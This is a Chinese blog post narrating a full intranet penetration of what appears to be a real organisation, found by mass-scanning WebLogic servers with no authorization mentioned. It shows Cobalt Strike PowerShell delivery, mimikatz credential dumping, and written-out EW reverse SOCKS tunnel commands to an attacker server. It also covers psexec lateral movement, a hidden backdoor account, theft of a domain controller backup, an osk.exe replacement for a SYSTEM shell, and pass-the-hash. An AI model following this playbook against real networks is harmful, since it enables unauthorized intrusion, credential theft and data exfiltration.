网络安全——内网渗透完整流程
因为主要还是想练习练习内网,所以用了最简单粗暴的方法去找寻找目标,利用 fofa 来批量了一波 weblogic,不出一会便找到了目标。
data:image/s3,"s3://crabby-images/70222/702228419f00d63e7336635d092353055ba30f34" alt=""
简单的看了下机器环境,出网,没有杀软(后面发现实际是有一个很小众的防火墙的,但是不拦 powershell),有内网环境。所以这里直接尝试 cs 自带的 Scripted Web Delivery 模块,直接创建一个 web 服务用于一键下载和执行 powershell。
data:image/s3,"s3://crabby-images/dd539/dd539171de468cb905660e51849d576d4ba9ae82" alt=""
运行刚刚生成的 powershell
data:image/s3,"s3://crabby-images/69def/69def63dffe8c5cf11b5b349aaafda6cdd9ba578" alt=""
这边的 CS 成功上线。
data:image/s3,"s3://crabby-images/8010a/8010a8b1de4ca010eda5675848a1ec7235edb9c5" alt=""
【一>所有资源获取<一】1、200 份很多已经买不到的绝版电子书 2、30G 安全大厂内部的视频资料 3、100 份 src 文档 4、常见安全面试题 5、ctf 大赛经典题目解析 6、全套工具包 7、应急响应笔记 8、网络安全学习路线
这里我们先来看看系统的信息。
data:image/s3,"s3://crabby-images/92453/92453c5d9ccc57449292d7124d5dfca5f5d3567e" alt=""
data:image/s3,"s3://crabby-images/d4d08/d4d085c3d5732c60dd688f9cc2aeb29bc87425b5" alt=""
根据上面的可知服务器是 2012 的,内网 IP 段在 192.168.200.x 接着用 Ladon 扫了下内网环境。
data:image/s3,"s3://crabby-images/33122/33122989218080b6f96c0e5a288335fe947bc9a0" alt=""
这个内网段机器不多,可以看出有域环境。接着进行了多网卡检测,web 检测。
data:image/s3,"s3://crabby-images/46198/4619879b26e83106e7237a634515942ba6d9cda1" alt=""
data:image/s3,"s3://crabby-images/4a228/4a228f7781c539d8b060f9c72bbb679f2d2f5acd" alt=""
data:image/s3,"s3://crabby-images/c8872/c8872be1c5f378a056fc0abb9b708f15987cfaf8" alt=""
可以看出这个内网有多个网段,开了一个 web 服务。mimikatz 只读到了一个用户跟加密的密码
data:image/s3,"s3://crabby-images/25547/255477e919b82bd3541871096d841bbdd120ad98" alt=""
密码可以在 CMD5 上解开
data:image/s3,"s3://crabby-images/d1c3f/d1c3fd592d8e29def1272d87165e6b4eccfc7545" alt=""
接下来就到最激动人心的扫描 MS17010 时刻!!!
data:image/s3,"s3://crabby-images/45a4e/45a4ebbacd94b10649630a0bd52b58a17e62c683" alt=""
可以看出有几台机器是可能存在 MS17010 的,所以打算开个 socks 代理直接 MSF 去打。这里劝大家买服务器的时候,尽量买按量计费的服务器所以这里,只能临时开了个按量计费的服务器,利用 EW 重新开了一条隧道出来。
具体流程如下:把 ew 文件丢上刚刚开的服务器,执行:ew -s rcsocks -l 1900 -e 1200 来配置一个转接隧道,意思就是将 1900 端口收到的代理请求转交给反连 1200 端口的主机
data:image/s3,"s3://crabby-images/03420/03420608f782a8af2c0701c39fbf0ffbe0a04604" alt=""
接着在目标机器上上传 ew 文件,执行:ew -s rssocks -d xxx.xxx.xxx.xxx(上方创建的服务器 IP) -e 1200,开启目标主机 socks5 服务并反向连接到中转机器的 1200 端口,执行完稍等会就可以看到多了一行连接完成。
data:image/s3,"s3://crabby-images/7025a/7025a34cb0c934bfcf8ee767d4603856913eaefd" alt=""
接着只需要在本地配置下代理就 OK 了。Windows 程序的话一般用 sockscap 配置以下这个代理就好了。
data:image/s3,"s3://crabby-images/8fe3e/8fe3e61e63f15f1b2588285b38d48ccc9b995810" alt=""
因为我们要用的是本地虚拟机里面的 kali 的 MSF,kali 的代理配置比较方便,先 vim /etc/proxychains.conf ,在最下面加上代理
data:image/s3,"s3://crabby-images/b228c/b228cc6b4fa8b82bc734d742d77f539cb04b0262" alt=""
保存后直接 proxychains 加上要启动的程序就挂上代理了。比如我们 msf 要挂代理,就直接:proxychains msfconsole 内网之路永远是那么坎坷,在经历了一番换 EXP,换工具+摇人之后,确定了 MS17010 确实是利用不了。既然捷径走不了,那么换一条路,从 web 入手。
data:image/s3,"s3://crabby-images/94feb/94febfcacee9dcb07d25d988f5882b89f8478c4d" alt=""
试了下弱口令注入啥的,没成功,谷歌翻译都翻译不过来,就算进了后台估计也看不懂,还是找其他途径吧。于是进一步开始信息搜集:
data:image/s3,"s3://crabby-images/0e9f0/0e9f08a32a93d6bd764ad1a007be9f61c0d28cc7" alt=""
查看保存登陆凭证,无
data:image/s3,"s3://crabby-images/43ee3/43ee3132d67498aea3a21dde3aa3ec210cd8e8ee" alt=""
查看共享计算机列表接着就开始尝试访问共享计算机的 C 盘
data:image/s3,"s3://crabby-images/34a80/34a8071d7fb33bff4c3433e4053d28b328da09bd" alt=""
在最后一台时,发现成功访问了 Ping 一下机器得到 IP 192.168.200.6
data:image/s3,"s3://crabby-images/c7e99/c7e992faad780299af7a0979d5b4f1782ba585f0" alt=""
右键一个 beacon 创建一个监听器
data:image/s3,"s3://crabby-images/186d6/186d6ab02d8a1f9a09558b0957ca72db5ba1a2c8" alt=""
data:image/s3,"s3://crabby-images/9daee/9daee17f32517dcef6f76f9171df1549d49a5092" alt=""
接着使用 psexec_psh 尝试上线 192.168.200.6 这台服务器
data:image/s3,"s3://crabby-images/bb269/bb2698cba189bb6aa51816161694e76fe4b83170" alt=""
成功上线
data:image/s3,"s3://crabby-images/dc3f5/dc3f58deab8d61c0a7bd9ad45a0d6bf9a79e132a" alt=""
接下来就对新上线的机器做一波信息搜集
data:image/s3,"s3://crabby-images/1860b/1860bdb8071ca22f731d5ecf9c35664e19fd629c" alt=""
data:image/s3,"s3://crabby-images/8f085/8f08549b3aa8a358e718be0ef10a9ae5321a9375" alt=""
没有其他发现接下来回到起点,看看这个网段里面还有哪些机器
data:image/s3,"s3://crabby-images/aed8d/aed8d5175db7bf771d255364e4686bac59b40b47" alt=""
可以看到有四台 linux 机器,分别是 22 , 1 , 5 , 11 这时候我们可以尝试一波弱口令。
data:image/s3,"s3://crabby-images/83d39/83d39000a503c0cfb453dfdeff15e0a5591a54ca" alt=""
data:image/s3,"s3://crabby-images/198ce/198cecad56ea773e95d078dc94c9845cddebdef2" alt=""
简单的查看了进程之类的信息,没有发现,虽然这时候已经拿下了内网得两台机器,但是都不是域内机器,其他的 linux 主机测试弱口令又不正确,又陷入了僵局。这时候,我看到先前拿下的.6 的那台机器名为 veeam backup,猜想这可能是一台备份服务器,他的硬盘内可能有备份文件,所以仔细检查了一下他的每个文件夹内容。
在 D 盘的文件夹下,发现了一个叫 Backup 的文件夹,里面存放了三个机器的备份。简单百度了下后缀,发现是一款叫 Veeam® Backup & Replication 的软件,他的功能是专门为 Vsphere 等做备份。
data:image/s3,"s3://crabby-images/fb9f1/fb9f13b2e901ebad25225dd121e48c7302e7760c" alt=""
一瞬间我的思路就清晰了,只需要在本地安装 Veeam® Backup & Replication 这软件,再将这台 DC 的全量备份包压缩传到本地,再恢复成虚拟机,然后通过 PE,用 CMD.EXE 重命名覆盖了 OSK.exe,这样子就可以在登录界面调出 system 的命令行,再想办法添加管理员账户或者修改管理员账户进入界面,本地上线 CS,再进行 hashdump 直接读出存储的域内用户 HASH,在通过 Pth 就可以直接拿下线上的 DC 了。说干就干,因为这台备份服务器不出网,但是他和 21 这台出网机器有一个共享文件夹,为了方便行事,偷偷在备份服务器上创建了一个隐藏账号,直接 7z 把最新的一个 DC 全量备份压缩成 700M 一个的压缩包,全部放到了共享文件夹中。出网的这台机器也只有 7001 端口出网,所以找到了 weblogic 的 web 路径,从共享文件夹中把压缩包都放进了 web 路径中,从 web 端进行下载。由于这台出网机器的带宽实在是太低了,均速 200K,还不停的卡掉,在经过了漫长的等待后,终于下了下来。在这漫长的下载过程中,我先一步本机下载下了 Veeam® Backup & Replication 这软件,突然发现一个很有意思的地方,就是他可以支持本地管理员账号登录。
data:image/s3,"s3://crabby-images/9ec68/9ec683d0b84b1f9d9ef5beac16ffe6e18af75c1f" alt=""
又因为他备份的是其他 IP 的虚拟机,我猜想他应该是登陆了 Vsphere。所以又一次挂代理连上去看看。
data:image/s3,"s3://crabby-images/9c189/9c1896b3ec8adc9c0f064f03081960f6f4f3766f" alt=""
data:image/s3,"s3://crabby-images/8841f/8841f9a2c3082a0d21cb58f17b1775340b08ebe3" alt=""
本地下载的那个全量备份在本地还原也很简单,只需要装了软件双击就回自动打开软件。
data:image/s3,"s3://crabby-images/b36dc/b36dc0462b61b39e80caf2eea182adaccb6ef503" alt=""
还原完成
data:image/s3,"s3://crabby-images/fa56b/fa56b16ff402816dcaa1ff5ae5d793514d0452ac" alt=""
接下来就简单了。下载老毛桃 ,生成一个 ISO 的 pe 工具箱
data:image/s3,"s3://crabby-images/537af/537af8a6dd27190357e6380cc83e72e6caead62d" alt=""
挂载到虚拟机中,开机按 ESC
data:image/s3,"s3://crabby-images/b9331/b9331f8fb87c41b00aeef3d4417573c2ac1e8744" alt=""
进入 PE 后,重命名 cmd.exe 为 osk.exe 将原来 C 盘中的\windows\system32\osk.exe 给覆盖了,这样子在开机的时候打开屏幕键盘就会弹出 SYSTEM 权限的命令行。
data:image/s3,"s3://crabby-images/b0700/b0700ee57eb34d5026a7e80cef0e1e51aa5cb2b6" alt=""
这里直接添加用户出现了点问题。
data:image/s3,"s3://crabby-images/526fc/526fc2e83b368f186336cda542ec92766107cac3" alt=""
最后将某个域用户修改密码后添加到本地管理员组成功进入了系统。最后生成 exe 上线的时候,防火墙终于起保护了。给防火墙一个正面图。
data:image/s3,"s3://crabby-images/bf892/bf8920b2846d5f9b14b4ae9f5819a57141c67fb5" alt=""
把他关了。
data:image/s3,"s3://crabby-images/d3a41/d3a41338df9b24388c41c630a9e5c72619375da9" alt=""
然而关闭要密码--最后还是用最初的 powershell 上线了。
data:image/s3,"s3://crabby-images/43bb3/43bb3ec7a7c32d9375340721f759a701513d393a" alt=""
接着最有仪式感的一幕
data:image/s3,"s3://crabby-images/dff29/dff290242ff40917038493beceb1fa0f930ba549" alt=""
最后只需要拿着 hash 去怼线上的 DC 就完事了。
评论